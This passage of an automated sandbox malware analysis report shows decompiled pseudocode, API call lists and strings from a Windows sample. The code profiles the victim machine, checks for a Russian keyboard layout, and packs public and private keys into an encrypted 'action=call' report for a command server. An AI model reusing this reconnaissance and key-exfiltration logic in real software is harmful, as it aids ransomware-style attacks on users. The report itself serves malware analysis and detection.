											 *(_t318 + 0x6c) = _v32(0x29a,  *(_t318 + 0x68), lstrlenW( *(_t318 + 0x68)) + _t238);
										}
										 *(_t318 + 0x70) =  *_v20;
										VirtualFree(_v16, 0, 0x8000); // executed
									}
									if( *((intOrPtr*)(_t318 + 0x74)) == 0) {
										L78:
										if( *(_t318 + 0x80) == 0) {
											L83:
											return 1;
										}
										_t182 = VirtualAlloc(0, 0x81, 0x3000, 4); // executed
										 *(_t318 + 0x84) = _t182;
										if(_t182 == 0) {
											L82:
											 *(_t318 + 0x80) = 0;
											goto L83;
										}
										_push(_t300);
										_t183 = E004068F0(_t182); // executed
										if(_t183 != 0) {
											goto L83;
										}
										VirtualFree( *(_t318 + 0x84), _t183, 0x8000); // executed
										goto L82;
									} else {
										_v68 = L"UNKNOWN";
										_v64 = L"NO_ROOT_DIR";
										_v60 = L"REMOVABLE";
										_v56 = L"FIXED";
										_v52 = L"REMOTE";
										_v48 = L"CDROM";
										_v44 = L"RAMDISK";
										_t185 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
										 *(_t318 + 0x7c) = _t185;
										_t301 =  &_v132;
										_t186 = 0x41;
										do {
											 *_t301 = _t186;
											_t301 = _t301 + 2;
											_t186 = _t186 + 1;
										} while (_t186 <= 0x5a);
										_t187 =  *L"?:\\"; // 0x3a003f
										_v40 = _t187;
										_t188 =  *0x40e308; // 0x5c
										_v36 = _t188;
										_t189 = 0;
										_v28 = 0;
										do {
											_v40 =  *((intOrPtr*)(_t319 + _t189 * 2 - 0x80));
											_t192 = GetDriveTypeW( &_v40); // executed
											_t310 = _t192;
											if(_t310 > 2 && _t310 != 5) {
												_v36 = 0;
												lstrcatW( *(_t318 + 0x7c),  &_v40);
												_v36 = 0x5c;
												lstrcatW( *(_t318 + 0x7c),  *(_t319 + _t310 * 4 - 0x40));
												lstrcatW( *(_t318 + 0x7c), "_");
												_t206 = GetDiskFreeSpaceW( &_v40,  &_v32,  &_v24,  &_v16,  &_v20); // executed
												if(_t206 == 0) {
													lstrcatW( *(_t318 + 0x7c), L"0,");
													goto L75;
												}
												_v12 = E00408470(_v20, 0, _v32 * _v24, 0);
												_t296 = _t307;
												_t209 = E00408470(_v16, 0, _v32 * _v24, 0);
												_t314 = _v12;
												_v8 = _t314 - _t209;
												asm("sbb eax, edx");
												_v12 = _t296;
												_t211 = lstrlenW( *(_t318 + 0x7c));
												_push(_t296);
												wsprintfW( &(( *(_t318 + 0x7c))[_t211]), L"%I64u/", _t314);
												_t214 = lstrlenW( *(_t318 + 0x7c));
												_push(_v12);
												wsprintfW( &(( *(_t318 + 0x7c))[_t214]), L"%I64u", _v8);
												_t320 = _t320 + 0x20;
												lstrcatW( *(_t318 + 0x7c), ",");
											}
											_t189 =  &(1[_v28]);
											_v28 = _t189;
										} while (_t189 < 0x1b);
										_t194 = lstrlenW( *(_t318 + 0x7c));
										_t300 =  *(_t318 + 0x7c);
										_t300[_t194 * 2 - 2] = 0;
										goto L78;
									}
								}
								__imp__GetNativeSystemInfo( &_v76); // executed
								_t252 = VirtualAlloc(0, 0x40, 0x3000, 4); // executed
								_t300 = _v76 & 0x0000ffff;
								 *(_t318 + 0x5c) = _t252;
								if(_t300 > 9) {
									L49:
									_push(L"Unknown");
									L50:
									wsprintfW(_t252, ??);
									_t320 = _t320 + 8;
									goto L51;
								}
								_t300 = _t300[E00407510] & 0x000000ff;
								switch( *((intOrPtr*)(_t300 * 4 +  &M004074FC))) {
									case 0:
										_push(L"x86");
										goto L50;
									case 1:
										_push(L"ARM");
										goto L50;
									case 2:
										_push(L"Itanium");
										goto L50;
									case 3:
										_push(L"x64");
										goto L50;
									case 4:
										goto L49;
								}
							}
							_t254 = VirtualAlloc(0, 0x82, 0x3000, 4); // executed
							_v20 = _t254;
							 *(_t318 + 0x50) = _t254;
							_v24 = 0;
							_t256 = RegOpenKeyExW(0x80000002, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", 0, 0x20019,  &_v28); // executed
							if(_t256 != 0) {
								L41:
								_push(_t300);
								E00406D10(_t300, 0x80000002, L"SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion", L"productName",  *(_t318 + 0x50), 0x80);
								wsprintfW( *(_t318 + 0x50), L"error");
								_t320 = _t320 + 8;
								goto L42;
							}
							_v32 = 0x80;
							_t260 = RegQueryValueExW(_v28, L"productName", 0, 0, _v20,  &_v32); // executed
							if(_t260 != 0) {
								GetLastError();
							} else {
								_v24 = 1;
							}
							RegCloseKey(_v28); // executed
							if(_v24 != 0) {
								goto L42;
							} else {
								goto L41;
							}
						}
						_t263 = VirtualAlloc(0, 0x8a, 0x3000, 4); // executed
						_v16 = _t263;
						_v28 = _t263 + 0xe;
						_t265 = VirtualAlloc(0, 4, 0x3000, 4); // executed
						 *(_t318 + 0x44) = _t265;
						_t316 = 1;
						_v8 = 1;
						_v12 = 0;
						do {
							wsprintfW(_v16, L"%d", _t316);
							_t320 = _t320 + 0xc;
							_v24 = 0;
							_t316 =  &(_t316[1]);
							_t268 = RegOpenKeyExW(0x80000001, L"Keyboard Layout\\Preload", 0, 0x20019,  &_v20); // executed
							if(_t268 != 0) {
								L27:
								_t269 = 0;
								_v8 = 0;
								L29:
								_t300 = _v12;
								goto L30;
							}
							_v32 = 0x80;
							_t273 = RegQueryValueExW(_v20, _v16, 0, 0, _v28,  &_v32); // executed
							if(_t273 != 0) {
								GetLastError();
							} else {
								_v24 = 1;
							}
							RegCloseKey(_v20); // executed
							if(_v24 == 0) {
								goto L27;
							} else {
								if(lstrcmpiW(_v28, L"00000419") != 0) {
									_t269 = _v8;
									goto L29;
								}
								wsprintfW( *(_t318 + 0x44), "1");
								_t320 = _t320 + 8;
								_t300 = 1;
								_t269 = 0;
								_v12 = 1;
								_v8 = 0;
							}
							L30:
						} while (_t316 != 9 && _t269 != 0);
						if(_t300 == 0) {
							wsprintfW( *(_t318 + 0x44), "0");
							_t320 = _t320 + 8;
						}
						VirtualFree(_v16, 0, 0x8000); // executed
						goto L35;
					}
					_t278 = VirtualAlloc(0, 0x80, 0x3000, 4); // executed
					_v24 = _t278;
					 *(_t318 + 0x38) = _t278;
					_v12 = 0;
					_t280 = RegOpenKeyExW(0x80000001, L"Control Panel\\International", 0, 0x20019,  &_v16); // executed
					if(_t280 != 0) {
						L17:
						 *(_t318 + 0x30) = 0;
						VirtualFree( *(_t318 + 0x38), 0, 0x8000);
						goto L18;
					}
					_v28 = 0x40;
					_t283 = RegQueryValueExW(_v16, L"LocaleName", 0, 0, _v24,  &_v28); // executed
					if(_t283 != 0) {
						GetLastError();
					} else {
						_v12 = 1;
					}
					RegCloseKey(_v16); // executed
					if(_v12 != 0) {
						goto L18;
					} else {
						goto L17;
					}
				} else {
					_t286 = VirtualAlloc(0, 0x80, 0x3000, 4); // executed
					 *(_t318 + 0x20) = _t286;
					if(_t286 == 0) {
						goto L11;
					}
					_push(_t300);
					_t287 = E00406D10(_t300, 0x80000002, L"SYSTEM\\CurrentControlSet\\services\\Tcpip\\Parameters", L"Domain", _t286, 0x80); // executed
					if(_t287 == 0) {
						wsprintfW( *(_t318 + 0x20), L"undefined");
						L10:
						_t320 = _t320 + 8;
						goto L11;
					}
					_t289 =  *(_t318 + 0x20);
					if( *_t289 != 0) {
						goto L11;
					}
					wsprintfW(_t289, L"WORKGROUP");
					goto L10;
				}
			}

0x00406d90
0x00406d9b
0x00406da7
0x00406db7
0x00406db9
0x00406dbc
0x00406dc1
0x00406dc8
0x00406dc8
0x00406dd2
0x00406ddf
0x00406de6
0x00406de8
0x00406deb
0x00406df0
0x00406df0
0x00406e00
0x00406e56
0x00406e5a
0x00406ef5
0x00406ef9
0x00407024
0x00407028
0x004070d6
0x004070da
0x00407134
0x00407138
0x0040713d
0x00407149
0x00407150
0x00407152
0x00407152
0x00407150
0x00407159
0x0040716d
0x0040717d
0x00407180
0x00407188
0x0040718b
0x00407191
0x00407194
0x0040719a
0x004071a4
0x004071a8
0x004071a8
0x004071ae
0x004071b4
0x004071b8
0x004071bf
0x004071cc
0x004071d4
0x004071dd
0x004071f6
0x004071fe
0x00407200
0x00407214
0x0040721b
0x00407223
0x0040722e
0x00407225
0x00407225
0x00407225
0x00407237
0x00407241
0x00407246
0x0040724c
0x0040724f
0x00407268
0x00407268
0x00407241
0x0040727a
0x00407282
0x0040728b
0x0040729e
0x004072a4
0x004072a9
0x004072c7
0x004072ab
0x004072c2
0x004072c2
0x004072da
0x004072e1
0x004072e1
0x004072f3
0x004074a0
0x004074a7
0x004074f0
0x004074f9
0x004074f9
0x004074b7
0x004074bd
0x004074c5
0x004074e4
0x004074e4
0x00000000
0x004074e4
0x004074c7
0x004074c9
0x004074d0
0x00000000
0x00000000
0x004074de
0x00000000
0x004072f9
0x00407307
0x0040730e
0x00407315
0x0040731c
0x00407323
0x0040732a
0x00407331
0x00407338
0x0040733a
0x0040733d
0x00407340
0x00407345
0x00407345
0x00407348
0x0040734b
0x0040734c
0x00407352
0x00407357
0x0040735a
0x0040735f
0x00407362
0x00407364
0x00407370
0x00407375
0x0040737d
0x00407383
0x00407388
0x00407399
0x004073a4
0x004073b2
0x004073b6
0x004073c0
0x004073d6
0x004073de
0x00407479
0x00000000
0x00407479
0x00407400
0x00407403
0x00407405
0x0040740a
0x00407416
0x00407419
0x0040741b
0x0040741e
0x00407427
0x00407438
0x00407446
0x00407448
0x0040745a
0x00407462
0x0040746d
0x0040746d
0x00407484
0x00407485
0x00407488
0x00407494
0x00407496
0x0040749b
0x00000000
0x0040749b
0x004072f3
0x004070e0
0x004070f1
0x004070f3
0x004070f7
0x004070fd
0x00407129
0x00407129
0x0040712e
0x0040712f
0x00407131
0x00000000
0x00407131
0x004070ff
0x00407106
0x00000000
0x00407122
0x00000000
0x00000000
0x00407114
0x00000000
0x00000000
0x0040711b
0x00000000
0x00000000
0x0040710d
0x00000000
0x00000000
0x00000000
0x00000000
0x00407106
0x0040703c
0x0040703e
0x00407041
0x00407059
0x00407060
0x00407068
0x004070ac
0x004070ac
0x004070c4
0x004070d1
0x004070d3
0x00000000
0x004070d3
0x0040706d
0x00407084
0x0040708c
0x00407097
0x0040708e
0x0040708e
0x0040708e
0x004070a0
0x004070aa
0x00000000
0x00000000
0x00000000
0x00000000
0x004070aa
0x00406f0d
0x00406f16
0x00406f20
0x00406f23
0x00406f25
0x00406f28
0x00406f2d
0x00406f34
0x00406f40
0x00406f49
0x00406f4b
0x00406f4e
0x00406f58
0x00406f6b
0x00406f73
0x00406fe3
0x00406fe3
0x00406fe5
0x00406fed
0x00406fed
0x00000000
0x00406fed
0x00406f78
0x00406f8d
0x00406f95
0x00406fa0
0x00406f97
0x00406f97
0x00406f97
0x00406fa9
0x00406fb3
0x00000000
0x00406fb5
0x00406fc5
0x00406fea
0x00000000
0x00406fea
0x00406fcf
0x00406fd1
0x00406fd4
0x00406fd9
0x00406fdb
0x00406fde
0x00406fde
0x00406ff0
0x00406ff0
0x00406fff
0x00407009
0x0040700b
0x0040700b
0x00407018
0x00000000
0x0040701e
0x00406e6e
0x00406e70
0x00406e73
0x00406e8b
0x00406e92
0x00406e9a
0x00406ede
0x00406ee8
0x00406eef
0x00000000
0x00406eef
0x00406e9f
0x00406eb6
0x00406ebe
0x00406ec9
0x00406ec0
0x00406ec0
0x00406ec0
0x00406ed2
0x00406edc
0x00000000
0x00000000
0x00000000
0x00000000
0x00406e02
0x00406e10
0x00406e12
0x00406e17
0x00000000
0x00000000
0x00406e19
0x00406e2f
0x00406e36
0x00406e51
0x00406e51
0x00406e53
0x00000000
0x00406e53
0x00406e38
0x00406e3f
0x00000000
0x00000000
0x00406e51
0x00000000
0x00406e51

APIs

VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 00406DB7
GetUserNameW.ADVAPI32(00000000,?), ref: 00406DC8
VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 00406DE6
GetComputerNameW.KERNEL32 ref: 00406DF0
VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 00406E10
wsprintfW.USER32 ref: 00406E51
VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 00406E6E
RegOpenKeyExW.KERNEL32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 00406E92
RegQueryValueExW.KERNEL32(00000000,LocaleName,00000000,00000000,?,?), ref: 00406EB6
GetLastError.KERNEL32 ref: 00406EC9
RegCloseKey.KERNEL32(00000000), ref: 00406ED2
VirtualFree.KERNEL32(004048B6,00000000,00008000), ref: 00406EEF
VirtualAlloc.KERNEL32(00000000,0000008A,00003000,00000004), ref: 00406F0D
VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000004), ref: 00406F23
wsprintfW.USER32 ref: 00406F49
RegOpenKeyExW.KERNEL32(80000001,Keyboard Layout\Preload,00000000,00020019,00404590), ref: 00406F6B
RegQueryValueExW.KERNEL32(00404590,00000000,00000000,00000000,?,?), ref: 00406F8D
GetLastError.KERNEL32 ref: 00406FA0
RegCloseKey.KERNEL32(00404590), ref: 00406FA9
lstrcmpiW.KERNEL32(?,00000419), ref: 00406FBD
wsprintfW.USER32 ref: 00406FCF
wsprintfW.USER32 ref: 00407009
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00407018
VirtualAlloc.KERNEL32(00000000,00000082,00003000,00000004), ref: 0040703C
RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020019,?), ref: 00407060
RegQueryValueExW.KERNEL32(?,productName,00000000,00000000,00404590,?), ref: 00407084
GetLastError.KERNEL32 ref: 00407097
RegCloseKey.KERNEL32(?), ref: 004070A0
wsprintfW.USER32 ref: 004070D1
GetNativeSystemInfo.KERNEL32(?), ref: 004070E0
VirtualAlloc.KERNEL32(00000000,00000040,00003000,00000004), ref: 004070F1
wsprintfW.USER32 ref: 0040712F
VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 0040716D
VirtualAlloc.KERNEL32(00000000,00000E0C,00003000,00000004), ref: 00407180
GetWindowsDirectoryW.KERNEL32(00000000,00000100), ref: 00407194
GetVolumeInformationW.KERNEL32(00000000,00000200,00000100,00000600,00000608,00000604,00000400,00000100), ref: 004071D4
RegOpenKeyExW.KERNEL32(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,00000000,00020019,?), ref: 004071F6
RegQueryValueExW.KERNEL32(?,ProcessorNameString,00000000,00000000,00000000,?), ref: 0040721B
GetLastError.KERNEL32 ref: 0040722E
RegCloseKey.ADVAPI32(?), ref: 00407237
lstrlenW.KERNEL32(00000000), ref: 00407246

Part of subcall function 00406D10: RegOpenKeyExW.KERNEL32(?,?,00000000,00020019,?,?,00000000,?,0040726D,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,Identifier,00000000,00000080,00000000), ref: 00406D26
Part of subcall function 00406D10: RegQueryValueExW.KERNEL32(?,00000000,00000000,00000000,00000080,?,?,0040726D,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,Identifier,00000000,00000080,00000000), ref: 00406D47
Part of subcall function 00406D10: RegCloseKey.KERNEL32(?,?,0040726D,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,Identifier,00000000,00000080,00000000), ref: 00406D57

wsprintfW.USER32 ref: 0040727A
lstrcatW.KERNEL32(?,00000000), ref: 0040728B
GetModuleHandleW.KERNEL32(ntdll.dll,RtlComputeCrc32), ref: 00407297
GetProcAddress.KERNEL32(00000000), ref: 0040729E
lstrlenW.KERNEL32(?), ref: 004072AE
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 004072E1
VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 00407338
GetDriveTypeW.KERNEL32(?), ref: 0040737D
lstrcatW.KERNEL32(?,?), ref: 004073A4
lstrcatW.KERNEL32(?,0041073C), ref: 004073B6
lstrcatW.KERNEL32(?,004107B0), ref: 004073C0
GetDiskFreeSpaceW.KERNEL32(?,?,?,00000000,00404590), ref: 004073D6

Strings

%I64u/, xrefs: 00407432
Keyboard Layout\Preload, xrefs: 00406F61
ARM, xrefs: 00407114
00000419, xrefs: 00406FB5
Itanium, xrefs: 0040711B
HARDWARE\DESCRIPTION\System\CentralProcessor\0, xrefs: 004071EC, 0040725E
ntdll.dll, xrefs: 00407292
%I64u, xrefs: 00407451
@, xrefs: 00406E9F
Unknown, xrefs: 00407129
?:\, xrefs: 00407352
WORKGROUP, xrefs: 00406E41
undefined, xrefs: 00406E49
Control Panel\International, xrefs: 00406E81
ProcessorNameString, xrefs: 0040720C
SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion, xrefs: 004070BA
Domain, xrefs: 00406E20
error, xrefs: 004070C9
SYSTEM\CurrentControlSet\services\Tcpip\Parameters, xrefs: 00406E25
RtlComputeCrc32, xrefs: 0040728D
productName, xrefs: 0040707C, 004070B5
Identifier, xrefs: 00407259
x64, xrefs: 0040710D
LocaleName, xrefs: 00406EAE
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0040704F
x86, xrefs: 00407122

Memory Dump Source

Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd

Yara matches

Similarity

API ID: Virtual$Alloc$wsprintf$CloseOpenQueryValue$ErrorFreeLastlstrcat$Namelstrlen$AddressComputerDirectoryDiskDriveHandleInfoInformationModuleNativeProcSpaceSystemTypeUserVolumeWindowslstrcmpi
String ID: %I64u$%I64u/$00000419$?:\$@$ARM$Control Panel\International$Domain$HARDWARE\DESCRIPTION\System\CentralProcessor\0$Identifier$Itanium$Keyboard Layout\Preload$LocaleName$ProcessorNameString$RtlComputeCrc32$SOFTWARE\Microsoft\Windows NT\CurrentVersion$SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion$SYSTEM\CurrentControlSet\services\Tcpip\Parameters$Unknown$WORKGROUP$error$ntdll.dll$productName$undefined$x64$x86
API String ID: 2088797152-983031137
Opcode ID: 74ffb924de28838f816d4790a0d5e143539f91be7cf099a53b34efc57e9b7aa9
Instruction ID: bc76af88716f23ffac07bfdbeb53bd65fae384ef587bd9da7bafbc6315d7b6d0
Opcode Fuzzy Hash: 74ffb924de28838f816d4790a0d5e143539f91be7cf099a53b34efc57e9b7aa9
Instruction Fuzzy Hash: 5A228570A40305AFEB209FA0CD49FAE7BB5FF04704F10442AF641B62E1D7B9A995CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00405750 Relevance: 87.9, APIs: 45, Strings: 5, Instructions: 416
stringmemoryencryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			E00405750(char __ecx, int __edx, BYTE* _a4, signed int _a8, long* _a12) {
				char _v295;
				char _v296;
				char _v404;
				char _v408;
				void* _v428;
				CHAR* _v432;
				int _v436;
				int _v440;
				char _v442;
				CHAR* _v444;
				short _v448;
				int _v452;
				char _v456;
				CHAR* _v464;
				int _v468;
				void* _v472;
				BYTE* _v476;
				WCHAR* _v480;
				WCHAR* _v484;
				void* _v488;
				void* _v492;
				short* _v496;
				CHAR* _v500;
				void* _v504;
				long _v508;
				CHAR* _v512;
				CHAR* _v528;
				CHAR* _t133;
				void* _t135;
				int _t145;
				void* _t148;
				int _t149;
				void* _t150;
				void* _t152;
				signed int _t159;
				signed int _t163;
				void* _t168;
				void* _t170;
				signed int _t172;
				void* _t183;
				CHAR* _t185;
				long _t189;
				intOrPtr _t199;
				int _t200;
				void _t202;
				int _t203;
				void _t204;
				int _t205;
				int _t210;
				long _t213;
				void* _t219;
				short _t228;
				char* _t229;
				WCHAR* _t231;
				short _t233;
				CHAR* _t234;
				char _t235;
				void* _t238;
				long _t240;
				long _t241;
				void* _t243;
				void* _t245;
				short _t248;
				int _t249;
				void* _t255;
				CHAR* _t256;
				WCHAR* _t258;
				WCHAR* _t259;
				signed int _t261;
				CHAR* _t262;
				CHAR* _t263;
				int _t267;
				void* _t268;
				long _t271;
				void* _t272;
				void* _t273;
				long _t279;
				int _t280;
				long _t281;
				void* _t282;
				CHAR* _t283;
				short _t284;

				_push(__ecx);
				_push(1);
				_push(__ecx);
				_push(1);
				_v456 = __ecx;
				_t210 = __edx;
				_v436 = __edx;
				_push(1);
				_push(__ecx);
				_push(1);
				_push(__ecx);
				_push(1);
				_push(__ecx);
				_push(1);
				_push(__ecx);
				_push(1);
				_push(1);
				_push(__ecx);
				_push(1);
				E004039B0( &_v404);
				E00406D90( &_v492); // executed
				_t255 = E00406BA0( &_v492);
				_t7 = _a8 + _t210 + 8; // 0x8
				_t213 = _t255 + _t7 * 8 << 3;
				_t133 = VirtualAlloc(0, _t213, 0x3000, 0x40); // executed
				_t248 = 0;
				_v512 = _t133;
				_v528 = _t133;
				_t228 = 0x30 + (_t255 + (_a8 + _t210) * 4) * 8;
				if(_t133 == 0 || _t228 >= _t213) {
					_v448 = _t248;
					_t256 = _t133;
				} else {
					_t256 =  &(_t133[_t228]);
					_v448 = _t133;
					_v444 = _t256;
					_t248 = _t228;
				}
				_t135 = 2 + _a8 * 8;
				if(_v428 == 0) {
					L7:
					_t229 = 0;
					_v432 = 0;
				} else {
					_t284 = _t248 + _t135;
					if(_t284 >= _t213) {
						goto L7;
					} else {
						_t229 = _t256;
						_v432 = _t256;
						_t256 =  &(_t256[_t135]);
						_t248 = _t284;
						_v444 = _t256;
					}
				}
				_t267 = _v440;
				if(_v428 == 0 || 2 + _t267 * 8 + _t248 >= _t213) {
					_t256 = 0;
					_v444 = 0;
				}
				if(_t229 == 0) {
					goto L53;
				} else {
					_t249 = _a8;
					_v436 = _t249 + _t249;
					CryptBinaryToStringA(_a4, _t249, 0x40000001, _t229,  &_v436);
					_v452 = _t267 + _t267;
					CryptBinaryToStringA(_v476, _t267, 0x40000001, _t256,  &_v452);
					_t145 = lstrlenA(_t256);
					_t271 = _t145 + lstrlenA(_v464) + 0x42;
					_t148 = VirtualAlloc(0, _t271, 0x3000, 0x40); // executed
					_v472 = _t148;
					_v488 = _t148;
					_v492 = 0;
					_t149 = lstrlenA(_v464);
					_t231 = _v472;
					_t150 = _t149 + 1;
					if(_t231 == 0 || _t150 >= _t271) {
						_v484 = 0;
					} else {
						_v492 = _t150;
						_v488 = _t231 + _t150;
						_v484 = _t231;
					}
					_t152 = lstrlenA(_t256) + 1;
					if(_v472 == 0 || _t152 + _v492 >= _t271) {
						_v488 = 0;
					}
					_t272 = 0;
					if(lstrlenA(_v464) != 0) {
						_t245 = _v484;
						_t263 = _v464;
						_v492 = _t245;
						do {
							_t204 =  *((intOrPtr*)(_t272 + _t263));
							if(_t204 != 0xa && _t204 != 0xd) {
								 *_t245 = _t204;
								_v492 = _t245 + 1;
							}
							_t272 = _t272 + 1;
							_t205 = lstrlenA(_t263);
							_t245 = _v492;
						} while (_t272 < _t205);
						_t256 = _v476;
					}
					_t273 = 0;
					if(lstrlenA(_t256) != 0) {
						_t243 = _v488;
						_v492 = _t243;
						do {
							_t202 =  *((intOrPtr*)(_t273 + _t256));
							if(_t202 != 0xa && _t202 != 0xd) {
								 *_t243 = _t202;
								_v492 = _t243 + 1;
							}
							_t273 = _t273 + 1;
							_t203 = lstrlenA(_t256);
							_t243 = _v492;
						} while (_t273 < _t203);
					}
					_t258 = _v480;
					lstrcatW(_t258, L"action=call&");
					_t259 =  &(_t258[lstrlenW(_t258)]);
					E004069A0( &_v440, _t259); // executed
					lstrcatW(_t259, L"&pub_key=");
					_t159 = lstrlenW(_t259);
					MultiByteToWideChar(0xfde9, 0, _v488, 0xffffffff,  &(_t259[_t159]), lstrlenA(_v488));
					lstrcatW(_t259, L"&priv_key=");
					_t163 = lstrlenW(_t259);
					MultiByteToWideChar(0xfde9, 0, _v492, 0xffffffff,  &(_t259[_t163]), lstrlenA(_v492));
					lstrcatW(_t259, L"&version=2.1");
					_t279 = (lstrlenW(_v484) << 4) + 0x12;
					_t168 = VirtualAlloc(0, _t279, 0x3000, 0x40); // executed
					_t219 = _t168;
					_v480 = _t219;
					_t170 = 2 + lstrlenW(_v484) * 8;
					if(_t219 == 0 || _t170 >= _t279) {
						_v492 = 0;
					} else {
						_v492 = _t219;
					}
					_t172 = lstrlenW(_v480);
					_t233 = "#shasj"; // 0x61687323
					_t261 = _t172;
					asm("movq xmm0, [0x410128]");
					_v448 = _t233;
					_t234 =  *0x410134; // 0x6a73
					_v444 = _t234;
					_t235 =  *0x410136; // 0x0
					asm("movq [esp+0x3c], xmm0");
					_v442 = _t235;
					_v296 = 0;
					E00408B30( &_v295, 0, 0xff);
					E00405C40( &_v296,  &_v456, lstrlenA( &_v456));
					_t280 = _t261 + _t261;
					E00405CF0( &_v296, _v480, _t280);
					_t262 = _v492;
					_v468 = _t261 * 8;
					if(CryptBinaryToStringA(_v480, _t280, 0x40000001, _t262,  &_v468) == 0) {
						GetLastError();
					}
					_t105 = lstrlenA(_t262) + 2; // 0x2
					_t281 = _t105;
					_t183 = VirtualAlloc(0, _t281, 0x3000, 0x40); // executed
					_v504 = _t183;
					_t107 = lstrlenA(_t262) + 1; // 0x1
					_t238 = _t107;
					_t185 = _v504;
					if(_t185 == 0) {
						L40:
						_v500 = 0;
					} else {
						_v500 = _t185;
						if(_t238 >= _t281) {
							goto L40;
						}
					}
					_t282 = 0;
					if(lstrlenA(_t262) != 0) {
						_t241 = _v500;
						_v508 = _t241;
						do {
							_t199 =  *((intOrPtr*)(_t282 + _t262));
							if(_t199 != 0xa && _t199 != 0xd) {
								 *_t241 = _t199;
								_v508 = _t241 + 1;
							}
							_t282 = _t282 + 1;
							_t200 = lstrlenA(_t262);
							_t241 = _v508;
						} while (_t282 < _t200);
					}
					_t283 = _v500;
					MultiByteToWideChar(0xfde9, 0, _t283, 0xffffffff, _v496, lstrlenA(_t283));
					_v508 = 0;
					_t189 = E00405370(_t283,  &_v508, 1); // executed
					if(_t189 != 0) {
						_t240 = _v508;
						if(_t240 != 0) {
							 *_a12 = _t240;
						}
						VirtualFree(_v504, 0, 0x8000);
						VirtualFree(_v492, 0, 0x8000);
						VirtualFree(_v488, 0, 0x8000);
						L53:
						_t268 = 1;
					} else {
						VirtualFree(_v504, _t189, 0x8000);
						VirtualFree(_v492, 0, 0x8000);
						VirtualFree(_v488, 0, 0x8000);
						_t268 = 0;
					}
				}
				VirtualFree(_v428, 0, 0x8000);
				E00407720( &_v408);
				return _t268;
			}

0x0040575f
0x00405760
0x00405762
0x00405763
0x00405768
0x0040576c
0x0040576e
0x00405772
0x00405774
0x00405775
0x00405777
0x00405778
0x0040577a
0x0040577b
0x0040577d
0x0040577e
0x00405783
0x00405785
0x00405786
0x0040578f
0x00405798
0x004057a9
0x004057b4
0x004057ba
0x004057c0
0x004057c6
0x004057c8
0x004057cc
0x004057d3
0x004057dc
0x004057f1
0x004057f5
0x004057e2
0x004057e2
0x004057e5
0x004057e9
0x004057ed
0x004057ed
0x004057ff
0x00405806
0x0040581f
0x0040581f
0x00405821
0x00405808
0x00405808
0x0040580d
0x00000000
0x0040580f
0x0040580f
0x00405811
0x00405815
0x00405817
0x00405819
0x00405819
0x0040580d
0x0040582a
0x0040582e
0x0040583d
0x0040583f
0x0040583f
0x00405845
0x00000000
0x0040584b
0x0040584b
0x00405857
0x0040586a
0x0040586f
0x00405883
0x0040588c
0x004058a0
0x004058a5
0x004058af
0x004058b3
0x004058b7
0x004058bf
0x004058c1
0x004058c5
0x004058c8
0x004058df
0x004058ce
0x004058d1
0x004058d5
0x004058d9
0x004058d9
0x004058ea
0x004058f0
0x004058fa
0x004058fa
0x00405906
0x0040590c
0x0040590e
0x00405912
0x00405916
0x00405920
0x00405920
0x00405925
0x0040592b
0x0040592e
0x0040592e
0x00405933
0x00405934
0x00405936
0x0040593a
0x0040593e
0x0040593e
0x00405943
0x00405949
0x0040594b
0x0040594f
0x00405953
0x00405953
0x00405958
0x0040595e
0x00405961
0x00405961
0x00405966
0x00405967
0x00405969
0x0040596d
0x00405953
0x00405971
0x00405981
0x00405990
0x00405994
0x0040599f
0x004059a2
0x004059c0
0x004059cc
0x004059cf
0x004059f1
0x004059fd
0x00405a17
0x00405a1d
0x00405a27
0x00405a29
0x00405a2f
0x00405a38
0x00405a46
0x00405a3e
0x00405a3e
0x00405a3e
0x00405a4e
0x00405a50
0x00405a56
0x00405a58
0x00405a67
0x00405a6b
0x00405a77
0x00405a7c
0x00405a85
0x00405a8b
0x00405a8f
0x00405a97
0x00405ab8
0x00405ac1
0x00405acf
0x00405ade
0x00405ae2
0x00405afe
0x00405b00
0x00405b00
0x00405b10
0x00405b10
0x00405b16
0x00405b1d
0x00405b23
0x00405b23
0x00405b26
0x00405b2c
0x00405b36
0x00405b36
0x00405b2e
0x00405b2e
0x00405b34
0x00000000
0x00000000
0x00405b34
0x00405b3f
0x00405b45
0x00405b47
0x00405b4b
0x00405b50
0x00405b50
0x00405b55
0x00405b5b
0x00405b5e
0x00405b5e
0x00405b63
0x00405b64
0x00405b66
0x00405b6a
0x00405b50
0x00405b6e
0x00405b84
0x00405b90
0x00405b9a
0x00405ba4
0x00405bd7
0x00405bdd
0x00405be2
0x00405be2
0x00405bf6
0x00405c03
0x00405c10
0x00405c1a
